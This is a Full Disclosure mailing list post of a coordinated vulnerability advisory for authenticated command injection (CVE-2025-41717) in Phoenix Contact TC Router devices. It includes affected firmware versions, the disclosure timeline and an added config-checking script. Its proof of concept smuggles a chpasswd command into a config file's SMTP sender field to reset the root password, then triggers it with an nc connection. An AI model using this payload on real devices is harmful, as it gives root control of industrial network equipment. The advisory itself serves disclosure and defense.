CyberDanube Security Research 20260119-0 | Authenticated Command Injection in Phoenix Contact TC Router Series


Full Disclosure mailing list archives


From: Thomas Weber | CyberDanube via Fulldisclosure <fulldisclosure () seclists org>
Date: Tue, 3 Feb 2026 11:13:05 +0000

CyberDanube Security Research 20260119-0
-------------------------------------------------------------------------------
                title| Authenticated Command Injection
              product| TC Router 5004T-5G EU
   vulnerable version| 1.06.18
        fixed version| 1.06.23
           CVE number| CVE-2025-41717
               impact| High
             homepage| https://www.phoenixcontact.com/
                found| 16.04.2025
                   by| D. Blagojevic, S. Dietz, F. Koroknai, T. Weber
                     | CyberDanube Security Research
                     | Vienna | St. Pölten
                     | This research was conducted in cooperation with VERBUND
                     | OT Cyber Security Lab during a penetration test.
                     |
                     | https://www.cyberdanube.com
                     |
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"What we do
Connecting, distributing, and controlling power and data flows - we have been
developing the right products for this purpose since 1923. Whether in
industrial production facilities, in the field of renewable energies, in
infrastructure, or for complex device connections: our solutions are used
wherever processes must run automatically. Above and beyond their pure
function, they help our partners to develop sustainable applications with more
efficient processes and reduced costs.

We are Phoenix Contact: With innovative products and solutions, we are paving
the way to a climate-neutral and sustainable world."

Source: https://www.phoenixcontact.com/en-us/company

Vulnerable versions
-------------------------------------------------------------------------------
Tested on TC Router version 1.06.18

According to the vendor, the following other products are also affected:

Product Name                | Affected Firmware Version
TC ROUTER 3002T-3G          | < FW 3.08.8
TC ROUTER 2002T-3G          | < FW 3.08.8
TC ROUTER 3002T-4G          | < FW 3.08.8
TC ROUTER 3002T-4G GL       | < FW 3.08.8
TC ROUTER 5004T-5G EU       | < FW 1.06.23
TC ROUTER 3002T-4G VZW      | < FW 3.08.8
TC ROUTER 3002T-4G ATT      | < FW 3.08.8
TC ROUTER 2002T-4G          | < FW 3.08.8
CLOUD CLIENT 1101TTX/TX     | < FW 3.07.7
TC CLOUD CLIENT 1002-4G ATT | < FW 3.08.8
TC CLOUD CLIENT 1002-TX/TX  | < FW 3.07.7

Vulnerability overview
-------------------------------------------------------------------------------
1) Authenticated Code Execution (CVE-2025-41717)
The device is vulnerable to an authenticated command injection. An attacker
with valid credentials could abuse this issue to execute arbitrary commands
as root.


Proof of Concept
-------------------------------------------------------------------------------
1) Authenticated Code Execution (CVE-2025-41717)
The config-upload endpoint can be used to inject arbitrary commands, which are
executed when the sock_server is polled. The malicious config changes the
root password and enables the service.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<entry name="conf/smtp/auth">1</entry>
<entry name="conf/smtp/from">p () t com&apos;$(echo &quot;root:password1!&quot;|chpasswd)&apos;</entry>
<entry name="conf/smtp/local">1</entry>
<entry name="conf/smtp/password">asdasdasd</entry>
<entry name="conf/smtp/port">25</entry>
<entry name="conf/smtp/server">192.168.19.138</entry>
[...]
<entry name="conf/alerts/sock_enable">1</entry>
<entry name="conf/alerts/sock_port">14323</entry>
<entry name="conf/alerts/sock_xml_io">0</entry>
<entry name="conf/alerts/sock_xml_nl">1</entry>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Connecting to the service and sending a mail triggers the command.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ nc 192.168.19.133 14323
<?xml version="1.0"?>
<email to="pwned () pwned com">
<subject>pwned</subject>
<body>
</body>
</email>

-------------------------------------------------------------------------------


Solution
-------------------------------------------------------------------------------
Install the latest available update. See vendor advisory for detailed version
information.


Workaround
-------------------------------------------------------------------------------
Restrict network access to the device.


Recommendation
-------------------------------------------------------------------------------
Configuration files should be reviewed before they are applied to the
device.
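A configuration review check of the kind recommended above, as an added example that is neither CyberDanube's nor Phoenix Contact's code: it parses the `<entry name="...">` format shown in the proof of concept, flags entry values containing shell metacharacters, and reports when the alerts socket listener is enabled. The `<config>` wrapper element, the sample export and the heuristics are assumptions, not the device's real schema.

```python
import re
import xml.etree.ElementTree as ET

# Shell metacharacters that have no place in an SMTP sender address, host name
# or similar text field; a value containing one is treated as suspicious.
SHELL_META = re.compile(r"[`$;|&<>'\"\\]")

# Constructed sample modelled on the advisory's config-upload fragment, wrapped
# in an assumed <config> root element. The sender address carries a $(...)
# substitution, as in the proof of concept (payload replaced by `id`).
SAMPLE_CONFIG = """<config>
<entry name="conf/smtp/auth">1</entry>
<entry name="conf/smtp/from">p@t.example&apos;$(id)&apos;</entry>
<entry name="conf/smtp/local">1</entry>
<entry name="conf/smtp/server">192.168.19.138</entry>
<entry name="conf/alerts/sock_enable">1</entry>
<entry name="conf/alerts/sock_port">14323</entry>
</config>"""


def review_config(xml_text):
    """Return a list of (entry name, reason) findings for a config export.

    The XML parser unescapes &apos;/&quot; entities, so the check sees the
    literal quote and $( characters that would reach a shell on the device.
    """
    root = ET.fromstring(xml_text)
    entries = {e.get("name", ""): (e.text or "") for e in root.iter("entry")}
    findings = []
    for name, value in entries.items():
        if SHELL_META.search(value):
            findings.append((name, "shell metacharacters in value: %r" % value))
    # The injected command only runs once the socket service is reachable,
    # so an enabled listener deserves a second look on its own.
    if entries.get("conf/alerts/sock_enable", "0").strip() == "1":
        port = entries.get("conf/alerts/sock_port", "?")
        findings.append(("conf/alerts/sock_enable",
                         "alerts socket listener enabled on port %s" % port))
    return findings


if __name__ == "__main__":
    for name, reason in review_config(SAMPLE_CONFIG):
        print("%s: %s" % (name, reason))
```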


Contact Timeline
-------------------------------------------------------------------------------
2025-07-17: Sent advisory to Phoenix Contact PSIRT.
2025-07-29: Vendor asked for a call to clarify the vulnerabilities.
2025-07-31: Aligned on timeline for September during call.
2025-08-19: Vendor confirmed publications for 2025-10-14. Confirmed the
            shift.
2025-09-25: Asked the vendor for another call to clarify details regarding all
            affected devices (including other advisories).
2025-09-26: Talked to vendor to clarify details.
2025-10-09: Asked for CVE Numbers. Received and included them in the advisory.
2025-11-18: Phone call with vendor. Agreed publication date after 2026-01-13.
2026-01-19: Coordinated release of security advisory.

Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T.Weber / @2026


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/



Source: https://seclists.org/fulldisclosure/2026/Feb/3